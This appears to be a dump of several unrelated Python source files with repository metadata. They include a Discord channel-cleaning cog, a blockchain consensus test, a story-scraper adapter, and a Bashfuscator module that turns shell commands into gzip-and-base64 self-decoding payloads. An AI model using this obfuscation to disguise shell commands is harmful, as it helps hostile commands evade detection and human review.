with LibdocOutput(output, format) as outfile:
LibdocWriter(format).write(self, outfile)
class KeywordDoc(object):
    """Documentation model for a single keyword: name, arguments and doc text."""

    def __init__(self, name='', args=None, doc=''):
        self.name = name
        self.args = args or []
        self.doc = doc

    @property
    def shortdoc(self):
        """First line of the keyword documentation, or '' when undocumented."""
        return self.doc.splitlines()[0] if self.doc else ''

    def __cmp__(self, other):
        # Python 2 ordering hook; Python 3 ignores __cmp__ entirely.
        return cmp(self.name.lower(), other.name.lower())

    def __lt__(self, other):
        # Case-insensitive ordering by name.  Required for sorted() on
        # Python 3, where __cmp__ is never called.
        return self.name.lower() < other.name.lower()
| true | true |
1c3347b8d7b003cb8c724ccfeb706a04aa53091d | 728 | py | Python | bashfuscator/modules/compressors/gzip.py | 0xflotus/Bashfuscator | 0615a061336641165d5055b916e81e6db8e3a5a6 | [
"MIT"
] | 859 | 2018-08-07T02:06:01.000Z | 2022-03-24T10:00:13.000Z | bashfuscator/modules/compressors/gzip.py | 0xflotus/Bashfuscator | 0615a061336641165d5055b916e81e6db8e3a5a6 | [
"MIT"
] | 25 | 2018-09-13T19:30:17.000Z | 2022-01-05T17:53:35.000Z | bashfuscator/modules/compressors/gzip.py | 0xflotus/Bashfuscator | 0615a061336641165d5055b916e81e6db8e3a5a6 | [
"MIT"
] | 123 | 2018-08-11T02:48:36.000Z | 2022-03-30T13:46:57.000Z | import gzip
from base64 import b64encode
from bashfuscator.core.mutators.compressor import Compressor
class Gzip(Compressor):
    """Compressor mutator: gzip the command and base64-armour the result."""

    def __init__(self):
        super().__init__(
            name="Gzip",
            description="Compress command with gzip",
            sizeRating=3,
            timeRating=3,
            binariesUsed=["base64", "gunzip"],
            author="capnspacehook"
        )

    def mutate(self, userCmd):
        """Return the obfuscated payload that decompresses and yields *userCmd*."""
        # gzip then base64 so the payload survives as printable shell text.
        encoded = b64encode(gzip.compress(userCmd.encode("utf-8"))).decode("utf-8")
        self.mangler.addPayloadLine(f'''* *:printf:^ ^'{encoded}'* *|* *:base64:^ ^-d* *|* *:gunzip:^ ^-c* *''')
        return self.mangler.getFinalPayload()
| 30.333333 | 118 | 0.605769 | import gzip
from base64 import b64encode
from bashfuscator.core.mutators.compressor import Compressor
class Gzip(Compressor):
    """Compressor mutator: gzip the command and base64-armour the result."""

    def __init__(self):
        super().__init__(
            name="Gzip",
            description="Compress command with gzip",
            sizeRating=3,
            timeRating=3,
            binariesUsed=["base64", "gunzip"],
            author="capnspacehook"
        )

    def mutate(self, userCmd):
        """Return the obfuscated payload that decompresses and yields *userCmd*."""
        compressedCmd = gzip.compress(userCmd.encode("utf-8"))
        compressedCmd = b64encode(compressedCmd).decode("utf-8")
        # printf the base64 blob, decode it, then gunzip back to the command.
        self.mangler.addPayloadLine(f'''* *:printf:^ ^'{compressedCmd}'* *|* *:base64:^ ^-d* *|* *:gunzip:^ ^-c* *''')
        return self.mangler.getFinalPayload()
| true | true |
1c3347f5caa6ecc7a8129ca79f55c18637f4c7d9 | 1,055 | py | Python | scripts/AssetChecker/src/checker/main/main.py | sreenut/BlockChain-Framework | 3abfd5420a977573e87e3f0afcd3e6354fa4884d | [
"MIT"
] | 8 | 2018-07-18T17:49:41.000Z | 2022-03-17T01:30:44.000Z | scripts/AssetChecker/src/checker/main/main.py | sreenut/BlockChain-Framework | 3abfd5420a977573e87e3f0afcd3e6354fa4884d | [
"MIT"
] | null | null | null | scripts/AssetChecker/src/checker/main/main.py | sreenut/BlockChain-Framework | 3abfd5420a977573e87e3f0afcd3e6354fa4884d | [
"MIT"
] | 1 | 2018-09-05T07:11:25.000Z | 2018-09-05T07:11:25.000Z | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 8 15:20:09 2017
@author: hpy2
"""
import requests
import json
import hashlib
from pyfiglet import Figlet
def main(filepath, trialchainip):
    """Look up the TrialChain record for the file at *filepath* and print it.

    Hashes the file with MD5, queries the ``data_asset`` endpoint on
    *trialchainip*, and pretty-prints the selected response fields as JSON
    below an ASCII-art banner.
    """
    url = "http://{0}:9000/trialchain/data_asset".format(trialchainip)
    with open(filepath, 'rb') as asset_file:
        digest = hashlib.md5(asset_file.read()).hexdigest()
    response = requests.get(url, params={"md5": digest, "trialchainip": trialchainip}).json()
    banner = Figlet(font='slant')
    print(banner.renderText('TrialChain'))
    # Re-emit the response fields in a fixed, human-friendly order.
    field_order = ('asset', 'sha256', 'issuetxid', 'source', 'issued',
                   'validated', 'ethstatus', 'confirmations', 'mchash', 'ethtxid')
    ordered = {field: response[field] for field in field_order}
    print(json.dumps(ordered, indent=4))
| 28.513514 | 76 | 0.603791 |
import requests
import json
import hashlib
from pyfiglet import Figlet
def main(filepath, trialchainip):
url = "http://{0}:9000/trialchain/data_asset".format(trialchainip)
with open(filepath, 'rb') as f:
data = f.read()
hasher = hashlib.md5()
hasher.update(data)
md5 = hasher.hexdigest()
r = requests.get(url, params={"md5": md5, "trialchainip": trialchainip})
response = r.json()
f = Figlet(font='slant')
print(f.renderText('TrialChain'))
ordered = {
'asset': response['asset'],
'sha256': response['sha256'],
'issuetxid': response['issuetxid'],
'source': response['source'],
'issued': response['issued'],
'validated': response['validated'],
'ethstatus': response['ethstatus'],
'confirmations': response['confirmations'],
'mchash': response['mchash'],
'ethtxid': response['ethtxid']
}
print(json.dumps(ordered, indent=4))
| true | true |
1c334a270215b12a5f4c0f304d453d9b7a73eb97 | 4,204 | py | Python | PugHelpBot/cogs/channel_clean.py | ZusorCode/PugHelpBot | 162904676bd9e876b2f69b3d3a299e3267ab8828 | [
"MIT"
] | null | null | null | PugHelpBot/cogs/channel_clean.py | ZusorCode/PugHelpBot | 162904676bd9e876b2f69b3d3a299e3267ab8828 | [
"MIT"
] | 1 | 2019-06-26T23:07:09.000Z | 2019-06-26T23:07:09.000Z | PugHelpBot/cogs/channel_clean.py | ZusorCode/PugHelpBot | 162904676bd9e876b2f69b3d3a299e3267ab8828 | [
"MIT"
] | 1 | 2019-06-24T18:41:15.000Z | 2019-06-24T18:41:15.000Z | from ..helpers import Config, get_unique_message_react_users, PingStatus, send_ping
from datetime import datetime, timedelta
import logging
import discord
from discord.ext import commands, tasks
class ChannelClean(commands.Cog):
    """Cog that periodically deletes (and, when warranted, pings for) old
    messages in the configured clean-up channels."""

    def __init__(self, bot: commands.Bot, log: logging.Logger, config: Config, ping_status: PingStatus):
        self.bot = bot
        self.log = log
        self.config = config
        self.ping_status = ping_status
        # Resolved channel objects; filled in by initialize() once the bot is ready.
        self.channels_to_check = None
        self.initialize.start()
        self.log.info("Loaded Cog ChannelClean")

    @tasks.loop(seconds=1, count=1)
    async def initialize(self):
        """One-shot task: resolve channel names and start the clean-up loop."""
        # wait until bot is fully ready
        await self.bot.wait_until_ready()
        self.channels_to_check = [discord.utils.get(self.bot.get_all_channels(), name=channel)
                                  for channel in self.config.clean_channels]
        self.clean_up_channel.start()
        self.log.info("CleanChannel is fully ready")

    async def auto_ping_message(self, message, unique_reacts):
        """Send a ping for *message* (when auto_ping is enabled) and record it
        as pinged either way, so it is not pinged again later."""
        if self.config.auto_ping:
            await send_ping(message, unique_reacts)
        self.ping_status.add_already_pinged(message.id)

    async def delete_message(self, message: discord.Message):
        """Delete *message* and log what was removed."""
        await message.delete()
        # If the message has normal content display it after deleting
        if message.content:
            self.log.warning(f"Deleted message {message.content} by {message.author.display_name} in {message.channel.name}")
        # Else the message must have an embed
        else:
            self.log.warning(f"Deleted an embed by {message.author.display_name} in {message.channel.name}")

    @tasks.loop(minutes=5)
    async def clean_up_channel(self):
        """Every 5 minutes, sweep messages older than delete_after_hours (but
        within the last 24h): ping for those with enough reacts, then delete.

        NOTE(review): the per-channel "Cleaning channel" log fires once per
        message, and the two react-threshold branches below are identical —
        both look accidental; confirm before changing behavior.
        """
        # Find the times between we want to check messages
        delete_hours_ago_time = datetime.utcnow() - timedelta(hours=self.config.delete_after_hours)
        day_ago = datetime.utcnow() - timedelta(hours=24)
        for channel in self.channels_to_check:  # For each channel obj in channels to check
            # Loop over all messages in the channel during the correct time
            async for message in channel.history(before=delete_hours_ago_time, after=day_ago):
                unique_reacts = await get_unique_message_react_users(message)
                message_react_count = len(unique_reacts)
                status_message = "It is a non-ping channel" if channel.name in self.config.avoid_pings else "It is a standard channel"
                self.log.warning(f"Cleaning channel {channel.name}\n{status_message}")
                # If the message is in avoid_pings just delete it
                if channel.name in self.config.avoid_pings:
                    await self.delete_message(message)
                else:
                    # If the message has enough reacts to have notified
                    if message_react_count >= self.config.min_reacts:
                        # If it was pinged for delete it
                        if message.id in self.ping_status.get_already_pinged_simple():
                            await self.delete_message(message)
                        # Else ping for it and delete the original message
                        else:
                            await self.auto_ping_message(message, unique_reacts)
                            await self.delete_message(message)
                    # If it didn't have enough reacts but has enough to not be deleted ping for it.
                    elif message_react_count >= self.config.min_reacts - self.config.avoid_delete_react_threshold:
                        # If it was pinged for delete it
                        if message.id in self.ping_status.get_already_pinged_simple():
                            await self.delete_message(message)
                        # Ping for it then delete original
                        else:
                            await self.auto_ping_message(message, unique_reacts)
                            await self.delete_message(message)
                    # If it didn't hit the threshold either just delete it
                    else:
                        await self.delete_message(message)
| 50.650602 | 134 | 0.624167 | from ..helpers import Config, get_unique_message_react_users, PingStatus, send_ping
from datetime import datetime, timedelta
import logging
import discord
from discord.ext import commands, tasks
class ChannelClean(commands.Cog):
    """Cog that periodically prunes stale messages from configured channels.

    Every sweep looks at messages older than ``config.delete_after_hours``
    but at most 24 hours old.  In ping-enabled channels, a message with
    enough unique reactions is announced (pinged) once before removal; in
    ``avoid_pings`` channels everything in the window is simply deleted.
    """

    def __init__(self, bot: commands.Bot, log: logging.Logger, config: Config, ping_status: PingStatus):
        self.bot = bot
        self.log = log
        self.config = config
        self.ping_status = ping_status
        # Channel objects are resolved in initialize(), once the bot is ready.
        self.channels_to_check = None
        self.initialize.start()
        self.log.info("Loaded Cog ChannelClean")

    @tasks.loop(seconds=1, count=1)
    async def initialize(self):
        """One-shot startup task: resolve channels, then start the sweep loop."""
        await self.bot.wait_until_ready()
        resolved = []
        for wanted in self.config.clean_channels:
            resolved.append(discord.utils.get(self.bot.get_all_channels(), name=wanted))
        self.channels_to_check = resolved
        self.clean_up_channel.start()
        self.log.info("CleanChannel is fully ready")

    async def auto_ping_message(self, message, unique_reacts):
        """Send a ping for *message* (when auto-ping is enabled) and record it."""
        if not self.config.auto_ping:
            return
        await send_ping(message, unique_reacts)
        self.ping_status.add_already_pinged(message.id)

    async def delete_message(self, message: discord.Message):
        """Delete *message* and log what was removed."""
        await message.delete()
        if not message.content:
            self.log.warning(f"Deleted an embed by {message.author.display_name} in {message.channel.name}")
        else:
            self.log.warning(f"Deleted message {message.content} by {message.author.display_name} in {message.channel.name}")

    @tasks.loop(minutes=5)
    async def clean_up_channel(self):
        """Sweep every watched channel and prune messages past the cutoff."""
        cutoff = datetime.utcnow() - timedelta(hours=self.config.delete_after_hours)
        window_start = datetime.utcnow() - timedelta(hours=24)
        for channel in self.channels_to_check:
            async for message in channel.history(before=cutoff, after=window_start):
                unique_reacts = await get_unique_message_react_users(message)
                react_count = len(unique_reacts)
                is_no_ping = channel.name in self.config.avoid_pings
                status_message = "It is a non-ping channel" if is_no_ping else "It is a standard channel"
                self.log.warning(f"Cleaning channel {channel.name}\n{status_message}")
                if is_no_ping:
                    await self.delete_message(message)
                    continue
                # A message deserves a ping if it reached min_reacts, or came
                # within avoid_delete_react_threshold of it; both original
                # branches performed the identical ping-then-delete sequence.
                ping_floor = self.config.min_reacts - self.config.avoid_delete_react_threshold
                if react_count >= self.config.min_reacts or react_count >= ping_floor:
                    if message.id not in self.ping_status.get_already_pinged_simple():
                        await self.auto_ping_message(message, unique_reacts)
                    await self.delete_message(message)
                else:
                    await self.delete_message(message)
| true | true |
1c334ab0b122af4b812c8f5d28e1a70012bb04b0 | 4,175 | py | Python | test/functional/onix_ignore_mpos_participant_reward.py | onixcoin-io/onix | 37c158a6229fa98c1a86f8b65e91226e36355fd6 | [
"MIT"
] | 6 | 2021-10-31T04:53:09.000Z | 2021-12-16T08:27:06.000Z | test/functional/onix_ignore_mpos_participant_reward.py | onixcoin-io/onix | 37c158a6229fa98c1a86f8b65e91226e36355fd6 | [
"MIT"
] | 1 | 2021-11-29T08:45:38.000Z | 2021-11-29T08:45:38.000Z | test/functional/onix_ignore_mpos_participant_reward.py | onixcoin-io/onix | 37c158a6229fa98c1a86f8b65e91226e36355fd6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
from test_framework.onix import *
import sys
import random
import time
class OnixIgnoreMPOSParticipantRewardTest(BitcoinTestFramework):
    """Regression test: a block whose staker keeps an MPoS participant's
    reward for itself (deleting the participant output) must be rejected."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1
        # Keep MPoS reward sharing active for the whole test.
        self.extra_args = [['-lastmposheight=999999']]

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def remove_from_staking_prevouts(self, remove_prevout):
        """Drop the staking prevout matching *remove_prevout* (first match only)."""
        for j in range(len(self.staking_prevouts)):
            prevout = self.staking_prevouts[j]
            if prevout[0].serialize() == remove_prevout.serialize():
                self.staking_prevouts.pop(j)
                break

    def run_test(self):
        # Deterministic private key so the generated outputs are spendable.
        privkey = byte_to_base58(hash256(struct.pack('<I', 0)), 239)
        for n in self.nodes:
            n.importprivkey(privkey)
        self.node = self.nodes[0]
        # Backdate the clock so the matured coinbases are old enough to stake.
        self.node.setmocktime(int(time.time()) - 1000000)
        self.node.generatetoaddress(10 + COINBASE_MATURITY, "qSrM9K6FMhZ29Vkp8Rdk8Jp66bbfpjFETq")
        # Deploy a trivial contract with a payable fallback:
        #   pragma solidity ^0.4.12;
        #   contract Test { function() payable { } }
        bytecode = "60606040523415600e57600080fd5b5b603580601c6000396000f30060606040525b5b5b0000a165627a7a723058205093ec5d227f741a4c8511f495e12b897d670259ab2f2b5b241af6af08753f5e0029"
        contract_address = self.node.createcontract(bytecode)['address']
        activate_mpos(self.node)
        self.staking_prevouts = collect_prevouts(self.node)
        # Only keep staking outputs with nValue == 20000.0 -- the rest of the
        # code relies on this.  (Fix: the previous pop(i)-then-increment loop
        # skipped the element following every removal, so stray prevouts with
        # other values could survive the filter.)
        self.staking_prevouts = [p for p in self.staking_prevouts
                                 if p[1] == 20000*COIN]
        nTime = int(time.time()) & 0xfffffff0
        self.node.setmocktime(nTime)
        # Find the block.number - 505 coinstake's 2nd output.
        # This will be an mpos participant.
        mpos_participant_block = self.node.getblock(self.node.getblockhash(self.node.getblockcount() - 505))
        mpos_participant_txid = mpos_participant_block['tx'][1]
        mpos_participant_tx = self.node.decoderawtransaction(self.node.gettransaction(mpos_participant_txid)['hex'])
        mpos_participant_pubkey = hex_str_to_bytes(mpos_participant_tx['vout'][1]['scriptPubKey']['asm'].split(' ')[0])
        mpos_participant_hpubkey = hash160(mpos_participant_pubkey)
        mpos_participant_addr = hex_hash_to_p2pkh(bytes_to_hex_str(mpos_participant_hpubkey))
        # Spend from the participant's address into a contract call (OP_CALL
        # with gas limit 4000000 and gas price 100000).
        tx = CTransaction()
        tx.vin = [make_vin_from_unspent(self.node, address=mpos_participant_addr)]
        tx.vout = [CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(4000000), CScriptNum(100000), b"\x00", hex_str_to_bytes(contract_address), OP_CALL]))]
        tx = rpc_sign_transaction(self.node, tx)
        self.remove_from_staking_prevouts(tx.vin[0].prevout)
        block, block_sig_key = create_unsigned_mpos_block(self.node, self.staking_prevouts, block_fees=int(10000*COIN)-397897500000, nTime=nTime)
        block.vtx.append(tx)
        block.vtx[1].vout.append(CTxOut(397897500000, scriptPubKey=CScript([OP_DUP, OP_HASH160, mpos_participant_hpubkey, OP_EQUALVERIFY, OP_CHECKSIG])))
        # Delete the mpos participant reward and assign it to the staker.
        block.vtx[1].vout.pop(-5)
        block.vtx[1].vout[1].nValue += 260210250000
        # Re-sign the tampered coinstake and re-seal the block.
        block.vtx[1] = rpc_sign_transaction(self.node, block.vtx[1])
        block.hashMerkleRoot = block.calc_merkle_root()
        block.sign_block(block_sig_key)
        # The tampered block must be rejected: the chain height stays put.
        blockcount = self.node.getblockcount()
        print(self.node.submitblock(bytes_to_hex_str(block.serialize())))
        assert_equal(self.node.getblockcount(), blockcount)

if __name__ == '__main__':
    OnixIgnoreMPOSParticipantRewardTest().main()
| 42.602041 | 183 | 0.692216 |
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
from test_framework.onix import *
import sys
import random
import time
class OnixIgnoreMPOSParticipantRewardTest(BitcoinTestFramework):
    """Regression test: a block whose staker keeps an MPoS participant's
    reward for itself (deleting the participant output) must be rejected."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1
        # Keep MPoS reward sharing active for the whole test.
        self.extra_args = [['-lastmposheight=999999']]

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def remove_from_staking_prevouts(self, remove_prevout):
        """Drop the staking prevout matching *remove_prevout* (first match only)."""
        for j in range(len(self.staking_prevouts)):
            prevout = self.staking_prevouts[j]
            if prevout[0].serialize() == remove_prevout.serialize():
                self.staking_prevouts.pop(j)
                break

    def run_test(self):
        # Deterministic private key so the generated outputs are spendable.
        privkey = byte_to_base58(hash256(struct.pack('<I', 0)), 239)
        for n in self.nodes:
            n.importprivkey(privkey)
        self.node = self.nodes[0]
        # Backdate the clock so the matured coinbases are old enough to stake.
        self.node.setmocktime(int(time.time()) - 1000000)
        self.node.generatetoaddress(10 + COINBASE_MATURITY, "qSrM9K6FMhZ29Vkp8Rdk8Jp66bbfpjFETq")
        # Bytecode of a trivial contract with a payable fallback function.
        bytecode = "60606040523415600e57600080fd5b5b603580601c6000396000f30060606040525b5b5b0000a165627a7a723058205093ec5d227f741a4c8511f495e12b897d670259ab2f2b5b241af6af08753f5e0029"
        contract_address = self.node.createcontract(bytecode)['address']
        activate_mpos(self.node)
        self.staking_prevouts = collect_prevouts(self.node)
        # Only keep staking outputs with nValue == 20000.0 -- later amounts
        # rely on this.  (Fix: the previous pop(i)-then-increment loop
        # skipped the element following every removal, so stray prevouts
        # with other values could survive the filter.)
        self.staking_prevouts = [p for p in self.staking_prevouts
                                 if p[1] == 20000*COIN]
        nTime = int(time.time()) & 0xfffffff0
        self.node.setmocktime(nTime)
        # The coinstake's 2nd output at height (tip - 505) will be an mpos
        # participant.
        mpos_participant_block = self.node.getblock(self.node.getblockhash(self.node.getblockcount() - 505))
        mpos_participant_txid = mpos_participant_block['tx'][1]
        mpos_participant_tx = self.node.decoderawtransaction(self.node.gettransaction(mpos_participant_txid)['hex'])
        mpos_participant_pubkey = hex_str_to_bytes(mpos_participant_tx['vout'][1]['scriptPubKey']['asm'].split(' ')[0])
        mpos_participant_hpubkey = hash160(mpos_participant_pubkey)
        mpos_participant_addr = hex_hash_to_p2pkh(bytes_to_hex_str(mpos_participant_hpubkey))
        # Spend from the participant's address into a contract call (OP_CALL
        # with gas limit 4000000 and gas price 100000).
        tx = CTransaction()
        tx.vin = [make_vin_from_unspent(self.node, address=mpos_participant_addr)]
        tx.vout = [CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(4000000), CScriptNum(100000), b"\x00", hex_str_to_bytes(contract_address), OP_CALL]))]
        tx = rpc_sign_transaction(self.node, tx)
        self.remove_from_staking_prevouts(tx.vin[0].prevout)
        block, block_sig_key = create_unsigned_mpos_block(self.node, self.staking_prevouts, block_fees=int(10000*COIN)-397897500000, nTime=nTime)
        block.vtx.append(tx)
        block.vtx[1].vout.append(CTxOut(397897500000, scriptPubKey=CScript([OP_DUP, OP_HASH160, mpos_participant_hpubkey, OP_EQUALVERIFY, OP_CHECKSIG])))
        # Delete the mpos participant reward and assign it to the staker.
        block.vtx[1].vout.pop(-5)
        block.vtx[1].vout[1].nValue += 260210250000
        # Re-sign the tampered coinstake and re-seal the block.
        block.vtx[1] = rpc_sign_transaction(self.node, block.vtx[1])
        block.hashMerkleRoot = block.calc_merkle_root()
        block.sign_block(block_sig_key)
        # The tampered block must be rejected: the chain height stays put.
        blockcount = self.node.getblockcount()
        print(self.node.submitblock(bytes_to_hex_str(block.serialize())))
        assert_equal(self.node.getblockcount(), blockcount)

if __name__ == '__main__':
    OnixIgnoreMPOSParticipantRewardTest().main()
| true | true |
1c334b8aca67275b6a7e930a5e216179e7a52f1a | 11,187 | py | Python | fanficfare/adapters/adapter_wwwnovelallcom.py | trishume/FanFicFare | 2ddce1acd5258f8dae5b3860aec1c9643a7a0807 | [
"Apache-2.0"
] | 3 | 2020-11-10T16:43:43.000Z | 2021-04-09T07:12:31.000Z | fanficfare/adapters/adapter_wwwnovelallcom.py | trishume/FanFicFare | 2ddce1acd5258f8dae5b3860aec1c9643a7a0807 | [
"Apache-2.0"
] | null | null | null | fanficfare/adapters/adapter_wwwnovelallcom.py | trishume/FanFicFare | 2ddce1acd5258f8dae5b3860aec1c9643a7a0807 | [
"Apache-2.0"
] | 1 | 2021-04-08T12:25:09.000Z | 2021-04-08T12:25:09.000Z | # -*- coding: utf-8 -*-
# Copyright 2018 FanFicFare team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
####################################################################################################
### Adapted by Rikkit on April 15. 2018
###=================================================================================================
### Tested with Calibre
####################################################################################################
from __future__ import absolute_import
import logging
import re
import json
# py2 vs py3 transition
from .base_adapter import BaseSiteAdapter, makeDate
from bs4 import Comment
from ..htmlcleanup import fix_excess_space, stripHTML
from .. import exceptions as exceptions
from ..dateutils import parse_relative_date_string
logger = logging.getLogger(__name__)
# Whitelist of legal HTML element names.  getChapterText renames any tag not
# in this tuple to <span>, since the site sometimes emits non-standard tags.
HTML_TAGS = (
    'a', 'abbr', 'acronym', 'address', 'applet', 'area', 'article', 'aside', 'audio', 'b', 'base', 'basefont', 'bdi',
    'bdo', 'big', 'blockquote', 'body', 'br', 'button', 'canvas', 'caption', 'center', 'cite', 'code', 'col',
    'colgroup', 'datalist', 'dd', 'del', 'details', 'dfn', 'dialog', 'dir', 'div', 'dl', 'dt', 'em', 'embed',
    'fieldset', 'figcaption', 'figure', 'font', 'footer', 'form', 'frame', 'frameset', 'h1', 'h2', 'h3', 'h4', 'h5',
    'h6', 'head', 'header', 'hr', 'html', 'i', 'iframe', 'img', 'input', 'ins', 'kbd', 'label', 'legend', 'li', 'link',
    'main', 'map', 'mark', 'menu', 'menuitem', 'meta', 'meter', 'nav', 'noframes', 'noscript', 'object', 'ol',
    'optgroup', 'option', 'output', 'p', 'param', 'picture', 'pre', 'progress', 'q', 'rp', 'rt', 'ruby', 's', 'samp',
    'script', 'section', 'select', 'small', 'source', 'span', 'strike', 'strong', 'style', 'sub', 'summary', 'sup',
    'svg', 'table', 'tbody', 'td', 'template', 'textarea', 'tfoot', 'th', 'thead', 'time', 'title', 'tr', 'track', 'tt',
    'u', 'ul', 'var', 'video', 'wbr')
def getClass():
    """Entry point used by the adapter registry: return this module's adapter class."""
    return WWWNovelAllComAdapter
class WWWNovelAllComAdapter(BaseSiteAdapter):
    ''' Adapter for www.novelall.com '''

    def __init__(self, config, url):
        """Normalize the story URL and seed basic metadata.

        Accepts both story URLs (/novel/<id>.html) and chapter URLs
        (/chapter/<slug>/<num>/); the latter are resolved to the real
        story URL later, in extractChapterUrlsAndMetadata.
        """
        BaseSiteAdapter.__init__(self, config, url)
        self.story.setMetadata('siteabbrev', 'novall')
        self.dateformat = "%Y-%m-%dT%H:%M:%S+00:00"
        self.is_adult = False
        self.username = None
        self.password = None
        # get storyId from url--url validation guarantees query correct
        m = re.match(self.getSiteURLPattern(), url)
        if m:
            # logger.debug("m.groups: %s"%m.groupdict())
            if m.group('novchap') == 'novel':
                self.story.setMetadata('storyId', m.group('id'))
                # normalized story URL.
                self._setURL("https://"+self.getSiteDomain()
                             + "/novel/"+self.story.getMetadata('storyId')
                             + ".html")
            else:
                # CHAPTER url -- TEMP storyId--both *will* be changed
                # in extractChapterUrlsAndMetadata
                # leave passed url unchanged for now.
                logger.debug("CHAPTER URL--will be replaced and storyId changed")
                self.story.setMetadata('storyId', m.group('id'))
        else:
            raise exceptions.InvalidStoryURL(url,
                                             self.getSiteDomain(),
                                             self.getSiteExampleURLs())

    @staticmethod
    def getSiteDomain():
        return 'www.novelall.com'

    @classmethod
    def getSiteExampleURLs(cls):
        return "https://www.novelall.com/novel/a-story-name.html"

    def getSiteURLPattern(self):
        # https://www.novelall.com/novel/Castle-of-Black-Iron.html
        # chapter URLs *don't* contain storyId
        # https://www.novelall.com/chapter/The-Legendary-Moonlight-Sculptor-Volume-1-Chapter-1/1048282/
        return r"https://www\.novelall\.com/(?P<novchap>novel|chapter)/(?P<id>[^/\.]+)(/\d+/?)?(\.html)?$"

    def extractChapterUrlsAndMetadata(self):
        """Fetch the story page and populate metadata plus the chapter list."""
        if self.is_adult or self.getConfig("is_adult"):
            addurl = "?waring=1"
        else:
            addurl = ""
        url = self.url+addurl
        logger.debug("URL: "+url)
        data = self.get_request(url)
        ## You need to have your is_adult set to true to get this story
        if "Please click here to continue the reading." in data:
            raise exceptions.AdultCheckRequired(self.url)
        soup = self.make_soup(data)
        if "/chapter/" in url:
            # Resolve a chapter URL to its parent story and refetch.
            titlea = soup.select("div.title a")[1] # second a is story.
            logger.debug("Changing from chapter URL(%s) to story URL(%s)"%(self.url,titlea['href']))
            url = titlea['href']
            m = re.match(self.getSiteURLPattern(), url)
            # logger.debug("m.groups: %s"%m.groupdict())
            self.story.setMetadata('storyId', m.group('id'))
            # normalized story URL.
            self._setURL("https://"+self.getSiteDomain()
                         + "/novel/"+self.story.getMetadata('storyId')
                         + ".html")
            url = self.url+addurl
            logger.debug("URL2: "+url)
            data = self.get_request(url)
            ## You need to have your is_adult set to true to get this story
            if "Please click here to continue the reading." in data:
                raise exceptions.AdultCheckRequired(self.url)
            soup = self.make_soup(data)
        ## JSON removed from site.
        # story_ld = json.loads(soup.find('script', type='application/ld+json').string)
        title = soup.find('h1').string
        if title.endswith(" Novel"):
            title = title[:-len(" Novel")]
        self.story.setMetadata('title', title)
        authorspan = soup.find('span',text='Author:')
        authora = authorspan.find_next_sibling('a')
        ## authors appear to just be comma separated and the only URL
        ## is a search, so this appears to work.
        for author in authora.string.split(','):
            self.story.addToList('author', author)
            self.story.addToList('authorId', author)
            self.story.addToList("authorUrl", "https://%s/search/?author=%s" % (self.getSiteDomain(), author))
        ## <i class="score-number">4<em>.1</em></i>
        self.story.setMetadata('stars',stripHTML(soup.find('i',class_='score-number')))
        ## I'm not finding a translator or publisher field anymore.
        # self.story.setMetadata('translator',story_ld["publisher"]["name"])
        ## getting votes
        ## FIX: was re.match, which anchors at position 0 of the page and
        ## could therefore never find "(N votes)" mid-document.
        mc = re.search(r"\((?P<votes>[\d,]+) votes\)", data)
        if mc:
            self.story.setMetadata('votes', mc.group('votes'))
        ## getting status
        status = soup.find('span', string='Status:').next_sibling.strip()
        if status == 'Completed':
            self.story.setMetadata('status', 'Completed')
        else:
            self.story.setMetadata('status', 'In-Progress')
        ## getting release frequency
        rf = soup.find('span', string='Release Frequency:')
        if rf:
            self.story.setMetadata('releaseFrequency', rf.next_sibling.strip())
        ## getting released
        released = soup.find('span', string='Released:')
        if released:
            self.story.setMetadata('released', released.find_next_sibling('a').string.strip())
        ## getting follows
        follows = soup.find('num', {"id": "follow_num"})
        if follows:
            self.story.setMetadata('follows', follows.string)
        ## getting views
        ## FIX: was re.match -- same anchoring problem as 'votes' above.
        mc = re.search(r"It has (?P<views>[\d,]+) views", data)
        if mc:
            self.story.setMetadata('views', mc.group('views'))
        ## getting alternative titles
        alt_titles = soup.find('span', string='Alternative(s):')
        if alt_titles:
            self.story.setMetadata('altTitles', alt_titles.next_sibling.string.split('; '))
        ## getting genres
        for a in soup.find('span', string='Genre(s):').find_next_siblings("a"):
            self.story.addToList('genre', a.string)
        ## getting tags
        tags = soup.find('span', string='Tag(s):')
        if tags:
            for a in tags.find_next_siblings("a"):
                self.story.addToList('sitetags', a.string)
        ## getting description
        self.setDescription(url, soup.select_one('#show').string.strip())
        ## getting cover
        img = soup.find('img', class_='detail-cover')
        if img:
            self.setCoverImage(url,img['src'])
        ## getting chapters -- listed newest-first on the page, so reverse.
        cdata = soup.select('.detail-chlist li')
        cdata.reverse()
        cdates = []
        for li in cdata:
            # <span class="time">31 minutes ago</span>s
            # <span class="time">Jul 15, 2017</span>
            dt = li.select_one('.time').string
            if "ago" in dt:
                cdates.append(parse_relative_date_string(dt))
            else:
                cdates.append(makeDate(dt, '%b %d, %Y'))
            # <a href="https://www.novelall.com/chapter/Stellar-Transformation-Volume-18-Chapter-45-part2/616971/" title="Stellar Transformation Volume 18 Chapter 45 part2">
            a = li.find('a')
            # Strip the story title prefix from the chapter title.
            ctitle = re.sub(r"^%s(.+)$" % re.escape(title), r"\1", a['title'], 0, re.UNICODE | re.IGNORECASE).strip()
            self.add_chapter(ctitle, a['href'])
        cdates.sort()
        self.story.setMetadata('datePublished', cdates[0])
        self.story.setMetadata('dateUpdated', cdates[-1])

    def getChapterText(self, url):
        """Download one chapter and return its cleaned-up HTML body."""
        data = self.get_request(url)
        # remove unnecessary <br> created to add space between advert
